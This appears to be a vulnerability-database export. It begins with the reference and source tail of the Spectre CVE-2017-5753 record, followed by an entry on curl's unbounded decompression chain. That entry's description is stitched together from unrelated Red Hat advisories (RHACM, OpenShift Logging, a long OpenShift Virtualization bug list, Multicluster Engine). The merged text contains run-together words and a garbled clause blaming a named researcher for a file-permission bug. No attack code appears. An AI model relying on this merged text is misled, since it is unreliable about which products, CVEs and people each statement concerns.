        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5332"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0861"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5333"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16914"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000199"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7492"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16913"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1092"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13220"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16912"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18203"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1049.58"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-euclid/4.4.0-9023.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-112.135"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3540-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0045"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0022"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3541-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.13.0-1006.8"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.13.0-1017.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.13.0-31.34~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.13.0-1007.10"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "PACKETSTORM",
        "id": "146015"
      },
      {
        "db": "PACKETSTORM",
        "id": "145717"
      },
      {
        "db": "PACKETSTORM",
        "id": "146501"
      },
      {
        "db": "PACKETSTORM",
        "id": "145964"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "146014"
      },
      {
        "db": "PACKETSTORM",
        "id": "145721"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146019"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#180049",
        "ident": null
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956",
        "ident": null
      },
      {
        "db": "BID",
        "id": "102371",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146015",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145717",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146501",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145964",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "147451",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145641",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146014",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145721",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145658",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "145666",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "146019",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2018-05-21T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049",
        "ident": null
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00304",
        "ident": null
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113956",
        "ident": null
      },
      {
        "date": "2018-01-03T00:00:00",
        "db": "BID",
        "id": "102371",
        "ident": null
      },
      {
        "date": "2018-01-23T04:31:56",
        "db": "PACKETSTORM",
        "id": "146015",
        "ident": null
      },
      {
        "date": "2018-01-06T18:01:01",
        "db": "PACKETSTORM",
        "id": "145717",
        "ident": null
      },
      {
        "date": "2018-02-21T19:22:00",
        "db": "PACKETSTORM",
        "id": "146501",
        "ident": null
      },
      {
        "date": "2018-01-18T20:41:22",
        "db": "PACKETSTORM",
        "id": "145964",
        "ident": null
      },
      {
        "date": "2018-05-03T01:31:56",
        "db": "PACKETSTORM",
        "id": "147451",
        "ident": null
      },
      {
        "date": "2018-01-04T01:20:35",
        "db": "PACKETSTORM",
        "id": "145641",
        "ident": null
      },
      {
        "date": "2018-01-23T04:31:47",
        "db": "PACKETSTORM",
        "id": "146014",
        "ident": null
      },
      {
        "date": "2018-01-06T18:01:22",
        "db": "PACKETSTORM",
        "id": "145721",
        "ident": null
      },
      {
        "date": "2018-01-04T17:52:00",
        "db": "PACKETSTORM",
        "id": "145658",
        "ident": null
      },
      {
        "date": "2018-01-04T17:53:07",
        "db": "PACKETSTORM",
        "id": "145666",
        "ident": null
      },
      {
        "date": "2018-01-23T04:32:21",
        "db": "PACKETSTORM",
        "id": "146019",
        "ident": null
      },
      {
        "date": "2018-01-04T13:29:00.257000",
        "db": "NVD",
        "id": "CVE-2017-5753",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2018-06-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049",
        "ident": null
      },
      {
        "date": "2018-01-08T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00304",
        "ident": null
      },
      {
        "date": "2021-11-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113956",
        "ident": null
      },
      {
        "date": "2019-04-17T06:00:00",
        "db": "BID",
        "id": "102371",
        "ident": null
      },
      {
        "date": "2025-01-14T19:29:55.853000",
        "db": "NVD",
        "id": "CVE-2017-5753",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "PACKETSTORM",
        "id": "146015"
      },
      {
        "db": "PACKETSTORM",
        "id": "146501"
      },
      {
        "db": "PACKETSTORM",
        "id": "146014"
      },
      {
        "db": "PACKETSTORM",
        "id": "146019"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "102371"
      }
    ],
    "trust": 0.3
  }
}

VAR-202206-1900

Vulnerability from variot - Updated: 2026-04-10 23:28

curl < 7.84.0 supports "chained" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a "malloc bomb", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors. Harry Sintonen incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/

Security fixes:

golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)
nodejs16: CRLF injection in node-undici (CVE-2022-31150)
nodejs/undici: Cookie headers uncleared on cross-origin redirect (CVE-2022-31151)
vm2: Sandbox Escape in vm2 (CVE-2022-36067)

Bug fixes:

RHACM 2.4 using deprecated APIs in managed clusters (BZ# 2041540)
vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes (BZ# 2074766)
cluster update status is stuck, also update is not even visible (BZ# 2079418)
Policy that creates cluster role is showing as not compliant due to Request entity too large message (BZ# 2088486)
Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster (BZ# 2089490)
ACM Console Becomes Unusable After a Time (BZ# 2097464)
RHACM 2.4.6 images (BZ# 2100613)
Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster (BZ# 2102436)
ManagedClusters in Pending import state after ACM hub migration (BZ# 2102495)
Bugs fixed (https://bugzilla.redhat.com/):

2041540 - RHACM 2.4 using deprecated APIs in managed clusters 2074766 - vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes 2079418 - cluster update status is stuck, also update is not even visible 2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message 2089490 - Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2097464 - ACM Console Becomes Unusable After a Time 2100613 - RHACM 2.4.6 images 2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster 2102495 - ManagedClusters in Pending import state after ACM hub migration 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici 2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2

Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working

JIRA issues fixed (https://issues.jboss.org/):

LOG-2647 - Add link to log console from pod views LOG-2801 - After upgrade all logs are stored in app indices LOG-2917 - Changing refresh interval throws error when the 'Query' field is empty

This advisory contains the following OpenShift Virtualization 4.12.0 images:

Security Fix(es):

golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

RHEL-8-CNV-4.12

============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89

Solution:

Before applying this update, you must apply all previously released errata relevant to your system.

To apply this update, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1719190 - Unable to cancel live-migration if virt-launcher pod in pending state 2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume 2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache 2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error 2040377 - Unable to delete failed VMIM after VM deleted 2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed 2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value 2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements 2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString 2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control 2060499 - [RFE] Cannot add additional service (or other objects) to VM template 2069098 - Large scale |VMs migration is slow due to low migration parallelism 2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass 2071491 - Storage Throughput metrics are incorrect in Overview 2072797 - Metrics in Virtualization -> Overview period is not clear or configurable 2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers 2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group 2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode 2086551 - Min CPU feature found in labels 2087724 - Default template show no boot source even there are auto-upload boot sources 2088129 - [SSP] webhook does not comply with restricted security context 2088464 - [CDI] cdi-deployment does not comply with restricted security context 2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR 2089744 - HCO should label its control plane namespace to admit pods at privileged security level 2089751 - 4.12.0 containers 2089804 - 4.12.0 rpms 2091856 - ?Edit BootSource? action should have more explicit information when disabled 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer 2093771 - The disk source should be PVC if the template has no auto-update boot source 2093996 - kubectl get vmi API should always return primary interface if exist 2094202 - Cloud-init username field should have hint 2096285 - KubeVirt CR API documentation is missing docs for many fields 2096780 - [RFE] Add ssh-key and sysprep to template scripts tab 2097436 - Online disk expansion ignores filesystem overhead change 2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP 2099556 - [RFE] Add option to enable RDP service for windows vm 2099573 - [RFE] Improve template's message about not editable 2099923 - [RFE] Merge "SSH access" and "SSH command" into one 2100290 - Error is not dismissed on catalog review page 2100436 - VM list filtering ignores VMs in error-states 2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2100629 - Update nested support KBASE article 2100679 - The number of hardware devices is not correct in vm overview tab 2100682 - All hardware devices get deleted while just delete one 2100684 - Workload profile are not editable during creation and after creation 2101144 - VM filter has two "Other" checkboxes which are triggered together 2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode 2101167 - Edit buttons clickable area is too large. 2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id 2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state 2101390 - Easy to miss the "tick" when adding GPU device to vm via UI 2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id 2101423 - wrong user name on using ignition 2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page 2101445 - "Pending changes - Boot Order" 2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user 2101499 - Cannot add NIC to VM template as non-priv user 2101501 - NAME parameter in VM template has no effect. 2101628 - non-priv user cannot load dataSource while edit template's rootdisk 2101667 - VMI view is not aligned with vm and tempates 2101681 - All templates are labeling "source available" in template list page 2102074 - VM Creation time on VM Overview Details card lacks string 2102125 - vm clone modal is displaying DV size instead of PVC size 2102132 - align the utilization card of single VM overview with the design 2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"? 2102256 - Add button moved to right 2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal 2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other' 2102561 - sysprep-info should link to downstream doc 2102737 - Clone a VM should lead to vm overview tab 2102740 - "Save" button on vm clone modal should be "Clone" 2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab 2103807 - PVC is not named by VM name while creating vm quickly 2103817 - Workload profile values in vm details should align with template's value 2103844 - VM nic model is empty 2104331 - VM list page scroll up automatically 2104402 - VM create button is not enabled while adding multiple environment disks 2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed 2104424 - Enable descheduler or hide it on template's scheduling tab 2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted 2104480 - Alerts in VM overview tab disappeared after a few seconds 2104785 - "Add disk" and "Disks" are on the same line 2104859 - [RFE] Add "Copy SSH command" to VM action list 2105257 - Can't set log verbosity level for virt-operator pod 2106175 - All pages are crashed after visit Virtualization -> Overview 2106963 - Cannot add configmap for windows VM 2107279 - VM Template's bootable disk can be marked as bootable 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read 2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header 2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse functions 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working 2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob 2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode 2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip 2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal 2108339 - datasource does not provide timestamp when updated 2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed 2109818 - Upstream metrics documentation is not detailed enough 2109975 - DataVolume fails to import "cirros-container-disk-demo" image 2110256 - Storage -> PVC -> upload data, does not support source reference 2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls 2111240 - GiB changes to B in Template's Edit boot source reference modal 2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics 2111328 - kubevirt plugin console crashed after visit vmi page 2111378 - VM SSH command generated by UI points at api VIP 2111744 - Cloned template should not label app.kubernetes.io/name: common-templates 2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi) 2112900 - button style are different 2114516 - Nothing happens after clicking on Fedora cloud image list link 2114636 - The style of displayed items are not unified on VM tabs 2114683 - VM overview tab is crashed just after the vm is created 2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12 2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass 2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items 2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates 2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF' 2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found" 2117549 - Cannot edit cloud-init data after add ssh key 2117803 - Cannot edit ssh even vm is stopped 2117813 - Improve descriptive text of VM details while VM is off 2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs 2118257 - outdated doc link tolerations modal 2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format 2119069 - Unable to start windows VMs on PSI setups 2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 2119309 - readinessProbe in VM stays on failed 2119615 - Change the disk size causes the unit changed 2120907 - Cannot filter disks by label 2121320 - Negative values in migration metrics 2122236 - Failing to delete HCO with SSP sticking around 2122990 - VMExport should check APIGroup 2124147 - "ReadOnlyMany" should not be added to supported values in memory dump 2124307 - Ui crash/stuck on loading when trying to detach disk on a VM 2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it 2124555 - View documentation link on MigrationPolicies page des not work 2124557 - MigrationPolicy description is not displayed on Details page 2124558 - Non-privileged user can start MigrationPolicy creation 2124565 - Deleted DataSource reappears in list 2124572 - First annotation can not be added to DataSource 2124582 - Filtering VMs by OS does not work 2124594 - Docker URL validation is inconsistent over application 2124597 - Wrong case in Create DataSource menu 2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile 2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state 2127787 - Expose the PVC source of the dataSource on UI 2127843 - UI crashed by selecting "Live migration network" 2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes 2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer 2128002 - Error after VM template deletion 2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards 2128872 - [4.11]Can't restore cloned VM 2128948 - Cannot create DataSource from default YAML 2128949 - Cannot create MigrationPolicy from example YAML 2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 2129013 - Mark Windows 11 as TechPreview 2129234 - Service is not deleted along with the VM when the VM is created from a template with service 2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data' 2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook 2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV 2130588 - crypto-policy : Common Ciphers support by apiserver and hco 2130695 - crypto-policy : Logging Improvement and publish the source of ciphers 2130909 - Non-privileged user can start DataSource creation 2131157 - KV data transfer rate chart in VM Metrics tab is not displayed 2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough 2131674 - Bump virtlogd memory requirement to 20Mi 2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11 2132682 - Default YAML entity name convention. 2132721 - Delete dialogs 2132744 - Description text is missing in Live Migrations section 2132746 - Background is broken in Virtualization Monitoring page 2132783 - VM can not be created from Template with edited boot source 2132793 - Edited Template BSR is not saved 2132932 - Typo in PVC size units menu 2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed 2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed 2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed 2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed 2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed 2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed 2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed 2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed 2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod 2134672 - [e2e] add data-test-id for catalog -> storage section 2134825 - Authorization for expand-spec endpoint missing 2135805 - Windows 2022 template is missing vTPM and UEFI params in spec 2136051 - Name jumping when trying to create a VM with source from catalog 2136425 - Windows 11 is detected as Windows 10 2136534 - Not possible to specify a TTL on VMExports 2137123 - VMExport: export pod is not PSA complaint 2137241 - Checkbox about delete vm disks is not loaded while deleting VM 2137243 - registery input add docker prefix twice 2137349 - "Manage source" action infinitely loading on DataImportCron details page 2137591 - Inconsistent dialog headings/titles 2137731 - Link of VM status in overview is not working 2137733 - No link for VMs in error status in "VirtualMachine statuses" card 2137736 - The column name "MigrationPolicy name" can just be "Name" 2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly 2138112 - Unsupported S3 endpoint option in Add disk modal 2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals 2138199 - Win11 and Win22 templates are not filtered properly by Template provider 2138653 - Saving Template prameters reloads the page 2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail 2138664 - VM that was created with SSH key fails to start 2139257 - Cannot add disk via "Using an existing PVC" 2139260 - Clone button is disabled while VM is running 2139293 - Non-admin user cannot load VM list page 2139296 - Non-admin cannot load MigrationPolicies page 2139299 - No auto-generated VM name while creating VM by non-admin user 2139306 - Non-admin cannot create VM via customize mode 2139479 - virtualization overview crashes for non-priv user 2139574 - VM name gets "emptyname" if click the create button quickly 2139651 - non-priv user can click create when have no permissions 2139687 - catalog shows template list for non-priv users 2139738 - [4.12]Can't restore cloned VM 2139820 - non-priv user cant reach vm details 2140117 - Provide upgrade path from 4.11.1->4.12.0 2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project 2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user 2140627 - Not able to select storageClass if there is no default storageclass defined 2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user 2140808 - Hyperv feature set to "enabled: false" prevents scheduling 2140977 - Alerts number is not correct on Virtualization overview 2140982 - The base template of cloned template is "Not available" 2140998 - Incorrect information shows in overview page per namespace 2141089 - Unable to upload boot images. 2141302 - Unhealthy states alerts and state metrics are missing 2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations 2141494 - "Start in pause mode" option is not available while creating the VM 2141654 - warning log appearing on VMs: found no SR-IOV networks 2141711 - Node column selector is redundant for non-priv user 2142468 - VM action "Stop" should not be disabled when VM in pause state 2142470 - Delete a VM or template from all projects leads to 404 error 2142511 - Enhance alerts card in overview 2142647 - Error after MigrationPolicy deletion 2142891 - VM latency checkup: Failed to create the checkup's Job 2142929 - Permission denied when try get instancestypes 2143268 - Topolvm storageProfile missing accessModes and volumeMode 2143498 - Could not load template while creating VM from catalog 2143964 - Could not load template while creating VM from catalog 2144580 - "?" icon is too big in VM Template Disk tab 2144828 - "?" icon is too big in VM Template Disk tab 2144839 - Alerts number is not correct on Virtualization overview 2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten 2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container

Description:

Multicluster Engine for Kubernetes 2.0.2 images

Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds.

